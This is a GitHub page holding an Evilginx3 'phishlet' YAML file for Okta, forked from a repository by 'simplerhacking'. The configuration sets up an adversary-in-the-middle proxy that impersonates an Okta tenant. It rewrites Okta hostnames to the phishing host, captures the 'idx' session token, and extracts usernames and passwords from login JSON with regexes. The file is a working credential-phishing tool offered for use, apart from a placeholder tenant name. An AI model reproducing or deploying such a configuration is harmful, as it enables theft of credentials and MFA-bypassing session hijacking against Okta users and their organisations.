forked from simplerhacking/Evilginx3-Phishlets
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathOkta.yaml
43 lines (42 loc) · 1.12 KB
/
Okta.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Advanced Configuration for Okta Tenant Interception
# Author: www.simplerhacking.com
# Minimum Version Required: 3.0.0
name: 'Okta'
author: 'www.simplerhacking.com'
min_ver: '3.0.0'
# Paste your actual Okta.com tenant in the <> parameter
proxy_hosts:
- phish_sub: '<okta-tenant-placeholder>'
orig_sub: '<okta-tenant-placeholder>'
domain: 'okta.com'
session: true
is_landing: true
auto_filter: true
sub_filters:
- triggers_on: '<okta-tenant-placeholder>'
orig_sub: ''
domain: '<okta-tenant-placeholder>'
search: '<okta-tenant-placeholder>.okta.com'
replace: '{hostname}'
mimes: ['application/ion+json']
- triggers_on: '<okta-tenant-placeholder>'
orig_sub: ''
domain: '<okta-tenant-placeholder>'
search: 'https.*\.okta\.com'
replace: 'https://{hostname}'
mimes: ['text/html']
auth_tokens:
- domain: '<okta-tenant-placeholder>'
keys: ['idx']
credentials:
username:
key: ''
search: '"identifier":"([^"]*)'
type: 'json'
password:
key: ''
search: '"passcode":"([^"]*)'
type: 'json'
login:
domain: '<okta-tenant-placeholder>'
path: '/login/login.htm'